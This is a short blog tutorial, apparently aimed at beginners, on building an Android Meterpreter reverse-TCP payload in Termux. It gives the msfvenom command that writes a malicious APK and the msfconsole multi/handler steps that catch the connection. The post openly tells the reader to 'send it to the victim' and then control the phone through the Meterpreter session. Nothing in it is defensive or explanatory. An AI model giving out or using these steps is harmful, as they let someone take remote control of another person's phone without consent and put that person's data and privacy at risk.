How To Generate A Payload Using Metasploit Framework in Termux


Today we'll show to you guys how to create a payload using metasploit framework in termux.

first you need to install metasploit.
we made a little tool for that, or you can just type:
- pkg install unstable repo && pkg install metasploit

STEPS:

open termux and type:

msfvenom -p android/meterpreter/reverse_tcp LPORT=4444 LHOST=your IP R >/sdcard/name.apk

after some seconds it will be appear  a little message that show the payload's size.

check in the file manager on the internal storage.

you'll see the payload, just send it to the victim or install the payload in a phone.

then, open termux and type:


-msfconsole

-use multi/handler

-set payload android/meterpreter/reverse_tcp

-set lport 4444

-set lhost your IP

-exploit

the job is done boys, when the meterpreter session is opened just type help to see what you can do.

Post a Comment

Comments Policy ⚠
Comments must strictly relate to the topic of the post. No spamming, links, racism, abusive words.

Previous Post Next Post

Pages